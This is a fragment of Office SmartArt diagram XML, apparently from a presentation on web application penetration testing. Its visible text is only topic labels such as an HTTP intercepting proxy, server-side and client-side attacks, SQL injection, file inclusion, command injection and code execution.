    <dgm:cxn modelId="{07CF40DB-34A7-4DCB-BA4B-17DD769D57E0}" type="presParOf" srcId="{6FC03271-BE89-4F81-9462-2B7E44B72E31}" destId="{15DBFB9B-4A2C-4EC3-B624-ACD4A1325DF2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{7FFCE523-63B2-43BE-9005-6D60A1BA80D9}" type="presParOf" srcId="{6FC03271-BE89-4F81-9462-2B7E44B72E31}" destId="{B40BFCFB-AB6D-4BCD-B320-B165903D74C0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{08582F2B-B2C5-4758-961C-CE4CAD89EAA9}" type="presParOf" srcId="{6FC03271-BE89-4F81-9462-2B7E44B72E31}" destId="{D20129EF-F297-4BCB-B7D2-E05346BCBAC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C62ED9-2751-4D7E-B8B4-75EB2026029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1AAB05-0E85-4888-A8F8-A5F65D1D9328}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Proxy for intercepting, inspecting and altering HTTP requests</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17CCF182-79B7-407D-B484-6C7A9C478A90}" type="parTrans" cxnId="{CD73603E-E1AF-4A19-90CC-547E2A21F095}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CAC9002B-CCB0-4A41-8360-150581C31703}" type="sibTrans" cxnId="{CD73603E-E1AF-4A19-90CC-547E2A21F095}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA8D5717-EB89-47C3-A7EF-C6F26B5D440A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Contains a wide range of wide range of web app pentesting related functionalities </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E2EC3CC-3252-4342-862F-CB4D4303657A}" type="parTrans" cxnId="{9E115968-72A7-45AB-8608-F080293F4C0F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E58B10CF-F12E-4F83-AB87-73BDF47DE2F5}" type="sibTrans" cxnId="{9E115968-72A7-45AB-8608-F080293F4C0F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4074F69D-5F56-4728-8164-ABD7886F61D1}" type="pres">
      <dgm:prSet presAssocID="{54C62ED9-2751-4D7E-B8B4-75EB20260292}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B896352F-ADFD-4581-A30F-AF21DFC157E6}" type="pres">
      <dgm:prSet presAssocID="{BA1AAB05-0E85-4888-A8F8-A5F65D1D9328}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30060432-2022-41D5-9C5F-6C6107A4F8FB}" type="pres">
      <dgm:prSet presAssocID="{BA1AAB05-0E85-4888-A8F8-A5F65D1D9328}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F327B1DA-0670-4426-941A-9A4B0C63BB75}" type="pres">
      <dgm:prSet presAssocID="{BA1AAB05-0E85-4888-A8F8-A5F65D1D93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E75F53F-AABE-4145-8A7A-29E53A97C64A}" type="pres">
      <dgm:prSet presAssocID="{BA1AAB05-0E85-4888-A8F8-A5F65D1D9328}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9128DCCD-3C7B-4603-83AD-B89CD08DD68E}" type="pres">
      <dgm:prSet presAssocID="{BA1AAB05-0E85-4888-A8F8-A5F65D1D9328}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A07CCD3D-D7EF-4E3F-93C4-BCFFFF6E1DE6}" type="pres">
      <dgm:prSet presAssocID="{CAC9002B-CCB0-4A41-8360-150581C31703}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{07FF16C8-565F-4A83-97FE-44ECCA9BAD86}" type="pres">
      <dgm:prSet presAssocID="{EA8D5717-EB89-47C3-A7EF-C6F26B5D440A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{229107CC-C275-4D3E-8964-435F5BB98AFE}" type="pres">
      <dgm:prSet presAssocID="{EA8D5717-EB89-47C3-A7EF-C6F26B5D440A}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE2704D2-359F-46D8-B9F8-ED40F00A63AE}" type="pres">
      <dgm:prSet presAssocID="{EA8D5717-EB89-47C3-A7EF-C6F26B5D44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439E833-500B-41E5-BC07-F82F7DD3AAEB}" type="pres">
      <dgm:prSet presAssocID="{EA8D5717-EB89-47C3-A7EF-C6F26B5D440A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE17D0CA-F27B-4E6B-AA96-117F5A159DD5}" type="pres">
      <dgm:prSet presAssocID="{EA8D5717-EB89-47C3-A7EF-C6F26B5D440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D73603E-E1AF-4A19-90CC-547E2A21F095}" srcId="{54C62ED9-2751-4D7E-B8B4-75EB20260292}" destId="{BA1AAB05-0E85-4888-A8F8-A5F65D1D9328}" srcOrd="0" destOrd="0" parTransId="{17CCF182-79B7-407D-B484-6C7A9C478A90}" sibTransId="{CAC9002B-CCB0-4A41-8360-150581C31703}"/>
    <dgm:cxn modelId="{C957A851-6A10-4DE2-A9E5-13AB7371008B}" type="presOf" srcId="{EA8D5717-EB89-47C3-A7EF-C6F26B5D440A}" destId="{FE17D0CA-F27B-4E6B-AA96-117F5A159DD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9E115968-72A7-45AB-8608-F080293F4C0F}" srcId="{54C62ED9-2751-4D7E-B8B4-75EB20260292}" destId="{EA8D5717-EB89-47C3-A7EF-C6F26B5D440A}" srcOrd="1" destOrd="0" parTransId="{7E2EC3CC-3252-4342-862F-CB4D4303657A}" sibTransId="{E58B10CF-F12E-4F83-AB87-73BDF47DE2F5}"/>
    <dgm:cxn modelId="{46AB93B2-A751-465E-A32E-C6C226D4704C}" type="presOf" srcId="{BA1AAB05-0E85-4888-A8F8-A5F65D1D9328}" destId="{9128DCCD-3C7B-4603-83AD-B89CD08DD68E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B42A60F0-11D0-4FCF-8CD6-31FD49E4E902}" type="presOf" srcId="{54C62ED9-2751-4D7E-B8B4-75EB20260292}" destId="{4074F69D-5F56-4728-8164-ABD7886F61D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{79EC595F-BBD3-4DFE-AF11-1586E828DF1C}" type="presParOf" srcId="{4074F69D-5F56-4728-8164-ABD7886F61D1}" destId="{B896352F-ADFD-4581-A30F-AF21DFC157E6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B838F725-9BA2-47BD-B264-53D735D8BE52}" type="presParOf" srcId="{B896352F-ADFD-4581-A30F-AF21DFC157E6}" destId="{30060432-2022-41D5-9C5F-6C6107A4F8FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A54B7FF1-6161-4FDF-926E-7D0352661ACC}" type="presParOf" srcId="{B896352F-ADFD-4581-A30F-AF21DFC157E6}" destId="{F327B1DA-0670-4426-941A-9A4B0C63BB75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{21AA396C-831E-4292-A86D-4AE805AF312C}" type="presParOf" srcId="{B896352F-ADFD-4581-A30F-AF21DFC157E6}" destId="{EE75F53F-AABE-4145-8A7A-29E53A97C64A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{46FC78C5-8D8B-4D07-BF9A-000F834AB345}" type="presParOf" srcId="{B896352F-ADFD-4581-A30F-AF21DFC157E6}" destId="{9128DCCD-3C7B-4603-83AD-B89CD08DD68E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{252B4F5E-A9B9-4F4D-B18D-550A655AE5E7}" type="presParOf" srcId="{4074F69D-5F56-4728-8164-ABD7886F61D1}" destId="{A07CCD3D-D7EF-4E3F-93C4-BCFFFF6E1DE6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{48D27171-A4E7-4E41-B3D3-0CA383261A43}" type="presParOf" srcId="{4074F69D-5F56-4728-8164-ABD7886F61D1}" destId="{07FF16C8-565F-4A83-97FE-44ECCA9BAD86}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DCE1E25A-0BE5-42E5-BA38-368DCC541E7C}" type="presParOf" srcId="{07FF16C8-565F-4A83-97FE-44ECCA9BAD86}" destId="{229107CC-C275-4D3E-8964-435F5BB98AFE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{ABD8262B-F987-47BC-B4C1-746A8B8A0F59}" type="presParOf" srcId="{07FF16C8-565F-4A83-97FE-44ECCA9BAD86}" destId="{AE2704D2-359F-46D8-B9F8-ED40F00A63AE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AF94CD77-CC4C-4BE7-B2E5-2AE55F635098}" type="presParOf" srcId="{07FF16C8-565F-4A83-97FE-44ECCA9BAD86}" destId="{F439E833-500B-41E5-BC07-F82F7DD3AAEB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{EC90F629-A533-4E2C-B1EE-28B5280FE39A}" type="presParOf" srcId="{07FF16C8-565F-4A83-97FE-44ECCA9BAD86}" destId="{FE17D0CA-F27B-4E6B-AA96-117F5A159D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FE72C4-A031-410E-BD12-A7C6FBF98B57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F3F15E-2985-457F-81D2-4A8C2BD84ECB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr cap="all"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Attacking the host – server side attacks</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2645C4B1-99D8-4B0A-AF2E-EB828E89B785}" type="parTrans" cxnId="{7C606F42-F985-4F1B-8F57-2124C0D97AD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF20342C-B4E0-431F-A780-37493F91E679}" type="sibTrans" cxnId="{7C606F42-F985-4F1B-8F57-2124C0D97AD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{840FEA63-AC7E-4EDD-87E7-05BBAEF5D5D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr cap="all"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Attacking the user – client side attacks </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31F876DA-F5B8-4DBA-A425-92A6D0D6BA7D}" type="parTrans" cxnId="{BA3D27FD-FDFC-434C-A61D-B5EA2A6DFDF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5302A3A5-C5D8-459A-BAD2-7675DAFF1AF4}" type="sibTrans" cxnId="{BA3D27FD-FDFC-434C-A61D-B5EA2A6DFDF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6FB6F86-BFE2-4207-8B6A-D95409A41336}" type="pres">
      <dgm:prSet presAssocID="{F0FE72C4-A031-410E-BD12-A7C6FBF98B57}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A78664C7-1CFF-4539-B785-AF4F29ABE94C}" type="pres">
      <dgm:prSet presAssocID="{ABF3F15E-2985-457F-81D2-4A8C2BD84ECB}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79E0EDAC-A270-4C30-8591-57AEE8AF6D85}" type="pres">
      <dgm:prSet presAssocID="{ABF3F15E-2985-457F-81D2-4A8C2BD84ECB}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CC971602-5F0D-4933-B3BC-4D02784182FB}" type="pres">
      <dgm:prSet presAssocID="{ABF3F15E-2985-457F-81D2-4A8C2BD84E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CA69731-66A0-490C-B12F-045C451A08B8}" type="pres">
      <dgm:prSet presAssocID="{ABF3F15E-2985-457F-81D2-4A8C2BD84ECB}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7C90A52-9882-4125-9D8F-2E4FB65D8442}" type="pres">
      <dgm:prSet presAssocID="{ABF3F15E-2985-457F-81D2-4A8C2BD84ECB}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B4149C7-4D18-4B06-81C2-8F89095236E1}" type="pres">
      <dgm:prSet presAssocID="{EF20342C-B4E0-431F-A780-37493F91E679}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B154367F-5483-49D1-9F22-D5E1CDE6F06A}" type="pres">
      <dgm:prSet presAssocID="{840FEA63-AC7E-4EDD-87E7-05BBAEF5D5D5}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E47D7B3F-7DB3-4FFA-99BD-FEFB8881B496}" type="pres">
      <dgm:prSet presAssocID="{840FEA63-AC7E-4EDD-87E7-05BBAEF5D5D5}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B1ACF90-0C8F-48BF-8465-94BD7071C9A5}" type="pres">
      <dgm:prSet presAssocID="{840FEA63-AC7E-4EDD-87E7-05BBAEF5D5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207FDF4-61E3-43A7-8632-DDE9BA84DD22}" type="pres">
      <dgm:prSet presAssocID="{840FEA63-AC7E-4EDD-87E7-05BBAEF5D5D5}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5E6E33D-8E78-4E2B-A037-CD6CD9B350BC}" type="pres">
      <dgm:prSet presAssocID="{840FEA63-AC7E-4EDD-87E7-05BBAEF5D5D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606F42-F985-4F1B-8F57-2124C0D97AD5}" srcId="{F0FE72C4-A031-410E-BD12-A7C6FBF98B57}" destId="{ABF3F15E-2985-457F-81D2-4A8C2BD84ECB}" srcOrd="0" destOrd="0" parTransId="{2645C4B1-99D8-4B0A-AF2E-EB828E89B785}" sibTransId="{EF20342C-B4E0-431F-A780-37493F91E679}"/>
    <dgm:cxn modelId="{C2AAA84A-595D-4EFD-AA44-39205B64104C}" type="presOf" srcId="{840FEA63-AC7E-4EDD-87E7-05BBAEF5D5D5}" destId="{B5E6E33D-8E78-4E2B-A037-CD6CD9B350BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{26FEE54D-29BB-4A5B-A9E6-BDA8C4866B0A}" type="presOf" srcId="{F0FE72C4-A031-410E-BD12-A7C6FBF98B57}" destId="{B6FB6F86-BFE2-4207-8B6A-D95409A41336}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{BA3D27FD-FDFC-434C-A61D-B5EA2A6DFDF7}" srcId="{F0FE72C4-A031-410E-BD12-A7C6FBF98B57}" destId="{840FEA63-AC7E-4EDD-87E7-05BBAEF5D5D5}" srcOrd="1" destOrd="0" parTransId="{31F876DA-F5B8-4DBA-A425-92A6D0D6BA7D}" sibTransId="{5302A3A5-C5D8-459A-BAD2-7675DAFF1AF4}"/>
    <dgm:cxn modelId="{C9ADADFF-7586-4713-AE6E-36677A0A776A}" type="presOf" srcId="{ABF3F15E-2985-457F-81D2-4A8C2BD84ECB}" destId="{E7C90A52-9882-4125-9D8F-2E4FB65D8442}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{14831194-E895-4425-8BAF-A6D058A29131}" type="presParOf" srcId="{B6FB6F86-BFE2-4207-8B6A-D95409A41336}" destId="{A78664C7-1CFF-4539-B785-AF4F29ABE94C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{E14346AF-83DE-4AEF-8BF1-236C07A9CFA6}" type="presParOf" srcId="{A78664C7-1CFF-4539-B785-AF4F29ABE94C}" destId="{79E0EDAC-A270-4C30-8591-57AEE8AF6D85}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{4836167A-2575-4037-9A77-BB90DEEC699A}" type="presParOf" srcId="{A78664C7-1CFF-4539-B785-AF4F29ABE94C}" destId="{CC971602-5F0D-4933-B3BC-4D02784182FB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{7F3163D2-24A8-4057-84D9-E82FB9B36189}" type="presParOf" srcId="{A78664C7-1CFF-4539-B785-AF4F29ABE94C}" destId="{0CA69731-66A0-490C-B12F-045C451A08B8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{D99BBBF5-9829-4CF3-B160-63BACFE97676}" type="presParOf" srcId="{A78664C7-1CFF-4539-B785-AF4F29ABE94C}" destId="{E7C90A52-9882-4125-9D8F-2E4FB65D8442}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{1EBECD7B-6986-4B07-8400-296BE18E6FDB}" type="presParOf" srcId="{B6FB6F86-BFE2-4207-8B6A-D95409A41336}" destId="{5B4149C7-4D18-4B06-81C2-8F89095236E1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{273FCDB3-9B10-432E-8FBA-1CBC709AC681}" type="presParOf" srcId="{B6FB6F86-BFE2-4207-8B6A-D95409A41336}" destId="{B154367F-5483-49D1-9F22-D5E1CDE6F06A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{0D4FAC6E-69AD-4F95-ACE1-09E74AF9A02C}" type="presParOf" srcId="{B154367F-5483-49D1-9F22-D5E1CDE6F06A}" destId="{E47D7B3F-7DB3-4FFA-99BD-FEFB8881B496}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{DDF606F6-CA39-4B0F-92DC-E0BBB6CDFB58}" type="presParOf" srcId="{B154367F-5483-49D1-9F22-D5E1CDE6F06A}" destId="{6B1ACF90-0C8F-48BF-8465-94BD7071C9A5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{9A9B64BE-F857-4E9B-A779-742FC2D5F6E6}" type="presParOf" srcId="{B154367F-5483-49D1-9F22-D5E1CDE6F06A}" destId="{5207FDF4-61E3-43A7-8632-DDE9BA84DD22}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{FA1168B5-7BF6-4CD0-830D-FA07BB73A842}" type="presParOf" srcId="{B154367F-5483-49D1-9F22-D5E1CDE6F06A}" destId="{B5E6E33D-8E78-4E2B-A037-CD6CD9B350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EAB597-22F0-4F40-BFC3-7FB8F80118A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D591CF-F7CE-4A6E-8C96-675A5B0E311A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>SQL injection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68DC5EE5-F3C9-4BE7-81CF-B83A36375962}" type="parTrans" cxnId="{BDA3A580-CD83-4F32-BA31-DEBE2EA6C97D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABF32C9B-86D5-4E99-A50F-90969893C05D}" type="sibTrans" cxnId="{BDA3A580-CD83-4F32-BA31-DEBE2EA6C97D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6358C29-2F16-45FF-BA27-11FA336BB2B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>File Inclusion vulnerabilities </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74931AAE-B682-4699-8AE3-E6E72077AA99}" type="parTrans" cxnId="{3C10D9C3-52BE-4A72-AC96-2DD6BE3C9BA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46D032B4-8342-4886-8552-5E760BB0A3E4}" type="sibTrans" cxnId="{3C10D9C3-52BE-4A72-AC96-2DD6BE3C9BA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0CE5EA9-D36B-47DE-9C71-7B5ED19AA919}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Command injection </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6700026F-4B26-4C50-969E-924290722B89}" type="parTrans" cxnId="{0A9719DA-EA2A-42D7-B004-9926112F5938}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4CDB8BA-154C-425A-BB42-E170FACC50D3}" type="sibTrans" cxnId="{0A9719DA-EA2A-42D7-B004-9926112F5938}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD097AFE-F962-4DA6-8DF4-ABBDF6BF3281}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Code execution</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5ABEC504-A1CF-46E6-9D9E-C09C25D2C643}" type="parTrans" cxnId="{501387DC-FB04-4C82-9A80-7BF8EFAC06B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2226FA9B-A186-44FC-93BE-0EDD0F5B438D}" type="sibTrans" cxnId="{501387DC-FB04-4C82-9A80-7BF8EFAC06B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F1A6E51-AE5B-DA4B-A806-5D0B159E2F34}" type="pres">
      <dgm:prSet presAssocID="{60EAB597-22F0-4F40-BFC3-7FB8F80118A7}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD17EB8B-2D18-E24F-8D8A-9A1608CD0338}" type="pres">
      <dgm:prSet presAssocID="{B5D591CF-F7CE-4A6E-8C96-675A5B0E31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843484-3BD8-D947-A4CE-38BC5E868A4D}" type="pres">
      <dgm:prSet presAssocID="{ABF32C9B-86D5-4E99-A50F-90969893C05D}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D077A4D8-CD8E-5646-9AF4-D88B4661AEDD}" type="pres">
      <dgm:prSet presAssocID="{F6358C29-2F16-45FF-BA27-11FA336BB2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75A6B7-DBA7-3745-9584-370CC74609EE}" type="pres">
      <dgm:prSet presAssocID="{46D032B4-8342-4886-8552-5E760BB0A3E4}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD131630-A37A-E449-A8A0-CBE2DDBA9B8E}" type="pres">
      <dgm:prSet presAssocID="{B0CE5EA9-D36B-47DE-9C71-7B5ED19AA9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7DD55D-EB0F-4D4D-A5CF-AB1F895258E3}" type="pres">
      <dgm:prSet presAssocID="{E4CDB8BA-154C-425A-BB42-E170FACC50D3}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
